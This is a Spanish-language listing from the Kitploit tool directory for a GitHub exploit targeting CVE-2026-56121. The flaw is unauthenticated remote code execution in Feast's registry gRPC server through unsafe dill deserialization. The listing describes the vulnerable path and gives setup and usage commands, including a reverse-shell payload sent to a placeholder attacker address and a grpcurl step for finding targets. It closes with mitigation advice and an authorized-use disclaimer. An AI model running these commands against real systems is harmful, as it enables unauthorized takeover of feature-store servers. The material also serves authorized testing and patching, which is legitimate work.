Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-56121_exploit | Kitploit
Herramientas/GitHubGitHub/0xdak/cve-2026-56121_exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHub0xdak/cve-2026-56121_exploit

CVE-2026-56121_exploit

Ver Repositorio
1hace 28 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-56121 — RCE no autenticado en Feast Registry (dill.loads)

Ejecución remota de código no autenticada en el servidor gRPC del registro del feature store Feast.

La RPC ApplyFeatureView reconstruye un OnDemandFeatureView a partir del proto de la solicitud. Al hacerlo, decodifica en base64 spec.user_defined_function.body y lo pasa a dill.loads() — antes de cualquier comprobación de autorización. dill es un superconjunto de pickle, por lo que un objeto cuyo __reduce__ devuelve (os.system, (cmd,)) ejecuta un comando arbitrario en el momento en que el servidor lo deserializa. El despliegue predeterminado incluye auth: no_auth, por lo que basta una única solicitud gRPC no autenticada al puerto del registro.

  • Afectados: Feast < 0.63.0
  • Corregido en: Feast 0.63.0
  • Puerto predeterminado: 6570 (gRPC del registro)
  • CWE: 502 (Deserialización de datos no confiables)
  • Impacto: RCE como el usuario del servicio de registro (a menudo todo el plano de control del feature store)

Requisitos

El exploit reutiliza los protos gRPC generados por el propio Feast, por lo que debes instalar una versión vulnerable de Feast en el lado del atacante:

root@kitploit:~
python3 -m venv venv && . venv/bin/activate
pip install "feast==0.62.0" grpcio

Uso

root@kitploit:~
# comprobación rápida (la salida aparece en el SERVIDOR, no localmente)
python3 exploit.py 10.10.10.10:6570 -c "id"

# shell inversa (wrapper bash -c: os.system usa /bin/sh, que carece de /dev/tcp)
python3 exploit.py 10.10.10.10:6570 -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"'

-p/--project establece el nombre del proyecto (por defecto feature_repo). La salida del comando se imprime en el stdout/journal del host del registro, así que usa una shell inversa o escribe en una ruta legible para observar los resultados.

Identificar un objetivo

El registro tiene habilitada la reflexión gRPC:

root@kitploit:~
grpcurl -plaintext 10.10.10.10:6570 list
# feast.registry.RegistryServer
# grpc.health.v1.Health
# grpc.reflection.v1alpha.ServerReflection

Mitigación

Actualiza a Feast 0.63.0+, habilita un backend de autenticación y nunca expongas el puerto gRPC del registro a redes no confiables.

Aviso legal

Solo para pruebas de seguridad autorizadas y fines educativos. Úsalo únicamente contra sistemas que poseas o para los que tengas permiso explícito de prueba.

Descargar herramienta